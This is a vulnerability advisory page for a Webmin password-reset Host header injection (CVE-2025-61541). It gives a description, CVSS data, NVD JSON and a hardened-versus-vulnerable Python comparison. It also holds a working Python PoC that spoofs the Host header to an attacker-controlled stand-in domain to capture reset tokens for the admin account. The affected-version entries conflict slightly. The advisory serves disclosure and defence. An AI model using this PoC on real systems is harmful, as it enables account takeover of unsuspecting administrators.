Security Vulnerability Report
CVE-2025-61541 CVSS 7.1 HIGH

CVE-2025-61541

Published: 2025-10-16 15:15:35
Last Modified: 2025-11-06 22:20:36

Description

Webmin 2.510 is vulnerable to a Host Header Injection in the password reset functionality (forgot_send.cgi). The reset link sent to users is constructed using the HTTP Host header via get_webmin_email_url(). An attacker can manipulate the Host header to inject a malicious domain into the reset email. If a victim follows the poisoned link, the attacker can intercept the reset token and gain full control of the target account.
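The flaw described above, reduced to its pattern and shown beside a hardened form. This is an added example, not Webmin's own Perl code: the function names, the `/reset?token=` path, and the `webmin.example.org` configuration are hypothetical.

```python
import re
from typing import Optional
from urllib.parse import quote

# Constructed sample configuration (assumption): the operator pins the
# externally reachable name instead of trusting the request.
CANONICAL_BASE = "https://webmin.example.org:10000"
ALLOWED_HOSTS = {"webmin.example.org:10000"}

# host[:port] only; IPv6 literals and anything carrying userinfo, a path or
# whitespace are rejected outright.
_HOST_RE = re.compile(r"([a-z0-9](?:[a-z0-9.-]*[a-z0-9])?)\.?(?::(\d{1,5}))?")


def build_reset_url_vulnerable(host_header: str, token: str) -> str:
    """Flawed pattern: the client-supplied Host header picks the link's domain."""
    return f"https://{host_header}/reset?token={quote(token, safe='')}"


def validated_host(host_header: str) -> Optional[str]:
    """Return the normalized host[:port] if it is an expected name, else None."""
    m = _HOST_RE.fullmatch(host_header.strip().lower())
    if m is None:
        return None
    name, port = m.group(1), m.group(2)
    candidate = f"{name}:{port}" if port else name
    return candidate if candidate in ALLOWED_HOSTS else None


def build_reset_url_hardened(host_header: str, token: str) -> str:
    """Refuse unexpected Host values and never copy the header into the link."""
    if validated_host(host_header) is None:
        raise ValueError("unexpected Host header, reset mail not sent")
    return f"{CANONICAL_BASE}/reset?token={quote(token, safe='')}"


if __name__ == "__main__":
    for host in ("webmin.example.org:10000", "attacker-controlled-domain.com"):
        print(host, "->", validated_host(host))
```

The hardened builder applies two independent controls: the link's origin comes only from configuration, and a request whose Host is not an expected name never triggers a reset mail.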

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:webmin:webmin:2.510:*:*:*:*:*:*:* - VULNERABLE
Webmin < 2.510

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61541 - Webmin Host Header Injection PoC
# This PoC demonstrates how to exploit the Host Header Injection
# vulnerability in Webmin 2.510's password reset functionality (forgot_send.cgi)

import requests

# Target Webmin server URL
target_url = "https://target-webmin-server:10000"

# Attacker's controlled domain to receive the reset token
attacker_domain = "attacker-controlled-domain.com"

# Step 1: Send password reset request with manipulated Host header
headers = {
    "Host": attacker_domain,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1"
}

# Target victim's email address
victim_email = "[email protected]"

# Password reset endpoint
reset_endpoint = "/forgot_send.cgi"

# Request payload
data = {
    "email": victim_email,
    "user": "admin"  # target username
}

print(f"[*] Sending password reset request with manipulated Host header...")
print(f"[*] Target: {target_url}{reset_endpoint}")
print(f"[*] Spoofed Host: {attacker_domain}")
print(f"[*] Victim email: {victim_email}")

# Send the request with spoofed Host header
response = requests.post(
    f"{target_url}{reset_endpoint}",
    headers=headers,
    data=data,
    verify=False
)

print(f"[*] Response status code: {response.status_code}")

if response.status_code == 200:
    print("[+] Password reset email sent successfully!")
    print("[+] The reset link in the email will point to the attacker's domain")
    print("[+] Waiting for victim to click the poisoned link...")
    print("[+] Once clicked, capture the reset token from the attacker's server logs")
else:
    print(f"[-] Request failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text[:200]}")

# Step 2: After capturing the reset token, use it to reset the password
# The reset token would be captured on the attacker's server
# Example: reset_token = "abc123def456"  # captured from attacker server logs
# reset_url = f"{target_url}/password_reset.cgi?token={reset_token}"
# Then submit new password to complete the account takeover
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61541", "sourceIdentifier": "[email protected]", "published": "2025-10-16T15:15:34.713", "lastModified": "2025-11-06T22:20:36.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webmin 2.510 is vulnerable to a Host Header Injection in the password reset functionality (forgot_send.cgi). The reset link sent to users is constructed using the HTTP Host header via get_webmin_email_url(). An attacker can manipulate the Host header to inject a malicious domain into the reset email. If a victim follows the poisoned link, the attacker can intercept the reset token and gain full control of the target account."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webmin:webmin:2.510:*:*:*:*:*:*:*", "matchCriteriaId": "60EA4AEE-565A-4F37-ADCD-8778FB128A81"}]}]}], "references": [{"url": "http://www.webmin.com/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bugdotexe/Vulnerability-Research/tree/main/CVE-2025-61541", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/webmin/webmin", "source": "[email protected]", "tags": ["Product"]}]}}